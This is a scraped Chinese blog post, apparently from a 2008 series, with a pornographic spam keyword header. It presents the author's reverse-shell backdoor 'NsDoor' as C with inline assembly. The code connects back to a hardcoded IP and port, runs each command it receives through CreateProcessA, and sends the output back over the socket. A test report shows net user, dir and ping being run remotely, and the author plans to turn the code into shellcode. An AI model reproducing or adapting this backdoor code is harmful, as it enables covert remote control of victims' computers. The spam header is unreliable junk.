日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

循环渐进NsDoor(七)

發布時間:2023/12/14 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 循环渐进NsDoor(七) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
本來這個和上一篇就是連著的,但是上一篇也太長了點 所以在這再開始 //#include<iostream>?
#include<winsock2.h>?
#pragma?comment(lib,"Ws2_32")?
//using?namespace?std;?
-
//#define?PORT?1517?
//#define?IP?"192.168.6.20"?
-
int?main()?
{?
????//WSADATA?ws;?
????//WSAStartup(MAKEWORD(2,2),&ws);?
????_asm?
????{?
?????????
????????mov?eax,0x71A26A55?
????????mov?[ebp+4],eax;??????????WSAStartup?
????????mov?eax,0x71A24211?
????????mov?[ebp+8],eax;??????????socket?
????????mov?eax,0x7C81D827?
????????mov?[ebp+12],eax;??????????CreatePipe?
????????mov?eax,0x71A2676F?
????????mov?[ebp+16],eax;?????????recv?
????????mov?eax,0x7C802446?
????????mov?[ebp+20],eax;????????Sleep?
????????mov?eax,0x7C922435?
????????mov?[ebp+24],eax;?????????memset?
????????mov?eax,0x7C80236B?
????????mov?[ebp+28],eax;????????CreateProcessA?
????????mov?eax,0x71A24A07?
????????mov?[ebp+32],eax;?????????connect?
????????mov?eax,0x71A24C27?
????????mov?[ebp+36],eax?;??????send?
????????mov?eax,0x7C801812?
????????mov?[ebp+40],eax?;????????ReadFile?
-
-
????????mov?[ebp+56],0?
????????mov?[ebp+60],0?
????????mov?[ebp+80],0?
????}?
????_asm?
????{?
-
????????sub?esp,400?
????????push?esp?
????????push?0x202?
????????call?[ebp+4]?
????}?
-
-
???//SOCKET?sockfd;?
????//sockfd?=?socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);?
????_asm?
????{?
????????push?6?
????????push?1?
????????push?2?
????????call?[ebp+8]?
????????//mov?sockfd,eax?
????????mov?ebx,eax?
????}?
-
????//struct?sockaddr_in?server;?
????//server.sin_family?=?AF_INET;?
????//server.sin_port?=?htons(PORT);?
????//server.sin_addr.S_un.S_addr?=?inet_addr(IP);?
-
????//while(connect(sockfd,(struct?sockaddr*)&server,sizeof?server)?==?-1);?
????_asm?
????{?
conn:?
????????push?0x1406A8C0?
????????mov?eax,0xED050002?
????????push?eax?
????????mov?esi,esp?
-
????????push?0x10?
????????push?esi?
????????push?ebx?
????????call?[ebp+32]?
????????cmp?eax,-1?
????????je?conn?
????}?
????//SECURITY_ATTRIBUTES?pipeattr;?
????//HANDLE?hReadPipe,hWritePipe;?
????//pipeattr.nLength?=?12;?
????//pipeattr.bInheritHandle?=?true;?
????//pipeattr.lpSecurityDescriptor?=?0;?
????//SECURITY_ATTRIBUTES*?ppi?=?&pipeattr;?
????//int?size?=?sizeof?pipeattr;?
????//cout<<&pipeattr<<endl<<size<<endl;?
????//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);?
????//HANDLE*?pr,pw;?
????//pr?=?&hReadPipe;?
????//pw?=?&hWritePipe;?
????_asm?
????{?
????????push?0x00000001?
????????push?0x00000000?
????????push?0x0000000c?
????????mov?eax,esp?
????????push?0?
????????push?eax?
??????lea?eax,?[ebp+60]??;&hWritePipe1?
??????push?eax?
???????lea?eax,?[ebp+56]??;&hReadPipe1?
???????push?eax?
???????call?[ebp+12]?
????}?
-
????//STARTUPINFOA?si;?
????//cout<<&si<<endl<<sizeof?si<<endl;?
????//ZeroMemory(&si,sizeof?si);?
?????
-
????//si.dwFlags?=?STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;?
????//si.wShowWindow?=?SW_HIDE;?
????//si.hStdOutput?=?si.hStdError?=?hWritePipe;//木輸入管道?
-
????//cout<<&si<<endl<<sizeof?si<<endl;?
????_asm?
????{?
????????push?0x00000F8C?
????????push?0x00000F8C?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000101?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????push?0x00000000?
????????mov?edi,esp?
????}?
?????
????//unsigned?long?lBytesRead?=?0;?
-
????//PROCESS_INFORMATION?ProcessInformation;?
-
-
-
????//char?Buf[1024]?=?{0};?
????//char?RecvBuf[200]?=?{0};?
?????while(true)?
?????{?
?????????//recv(sockfd,RecvBuf,200,0);?
?????????_asm?
?????????{?
?????????????push?0?
?????????????push?200?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?ebx?
?????????????call?[ebp+16]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
?????????//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);?
?????????//STARTUPINFOA*?psi?=?&si;?
?????????//PROCESS_INFORMATION*?proc?=?&ProcessInformation;?
?????????//cout<<proc<<endl<<sizeof?ProcessInformation<<endl;?
-
-
?????????_asm?
?????????{?
conn2:?
?????????????push?0x7c969564?
?????????????push?0x7c98d144?
?????????????push?0xffffffff?
?????????????push?0x7c98d168?
?????????????mov?eax,esp?
?????????????push?eax?
?????????????push?edi?
?????????????push?0?
?????????????push?0?
?????????????push?0?
?????????????push?1?
?????????????push?0?
?????????????push?0?
?????????????lea?eax,[ebp-4cch]?
?????????????push?eax?
?????????????push?0?
?????????????call?[ebp+28]?
?????????????cmp?eax,0?
?????????????je?conn2?
?????????}?
-
-
-
?????????????//Sleep(1000);?
?????????_asm?
?????????{?
?????????????push?300?
?????????????call?[ebp+20]?
?????????}?
?????????//cout<<RecvBuf<<endl;?
-
????????????//?ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);?
?????????????//LPDWORD?plbr?=?&lBytesRead;?
?????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?edi?
?????????????????push?1024?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?[ebp+56]?
?????????????????call?[ebp+40]?
?????????????}?
????????????//?cout<<Buf<<endl;?
?????????????//cout<<"flag"<<endl;?
-
????????????//send(sockfd,Buf,1024,0);?
????????????_asm?
?????????????{?
?????????????????push?0?
?????????????????push?[edi]?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????push?ebx?
?????????????????call?esi?
?????????????}?
????????????//cout<<Buf<<endl;?
?????????????//memset(Buf,0,1024);?
?????????????_asm?
?????????????{?
?????????????????push?1024?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cbh]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
?????????????//Sleep(100);?
?????????????_asm?
?????????????{?
?????????????????push?100?
?????????????????call?[ebp+20]?
?????????????}?
-
-
?????????//memset(RecvBuf,0,200);?
?????????????_asm?
?????????????{?
?????????????????push?200?
?????????????????push?0?
?????????????????lea?eax,[ebp-4cch]?
?????????????????push?eax?
?????????????????call?[ebp+24]?
?????????????}?
-
?????}?
-
?????return?0;?
}?
-
-
-
 - 前面已經分析了很多函數,我下面就不仔細分析了,把我分析好的代碼貼出來show下,呵呵: 呵呵,很強大吧 看著輕松,我花了三天才搞定所有,里面的意外太多了,內存一個字節一個字節的摳數據,地址跳轉不對,返回值被刷掉,意外太多了…. 累死我了 - - - 測試報告: - 目前這個代碼基本能使用,偶爾出現死在ReadFile處的事情,這個很早以前就遇到過,還有時候會遇到Send函數的地址訪問沖突, 但是debug的時候都很正常,反彈后門完全可以使用,不是debug時,偶爾會出現客戶端和服務端互相等待的事情…. 服務端 - - 客戶端 - - 呵呵,訪問成功啦 - - 執行net user和time的情形 - - - Dir的結果 - Dir&time的結果 - 輸入錯誤的結果 - - Ping的結果,照樣出現延遲,不過一點也不影響結果,呵呵 - - 哈哈,到這里NsDoor的前期版本,或者說服務端優化基本快完了,技術性的工作已經沒了,期待 shellcode吧 - - - ---------------by????NewSketcher Time:????080822????21:20

轉載于:https://www.cnblogs.com/ns517/archive/2008/10/04/1303756.html

總結

以上是生活随笔為你收集整理的循环渐进NsDoor(七)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。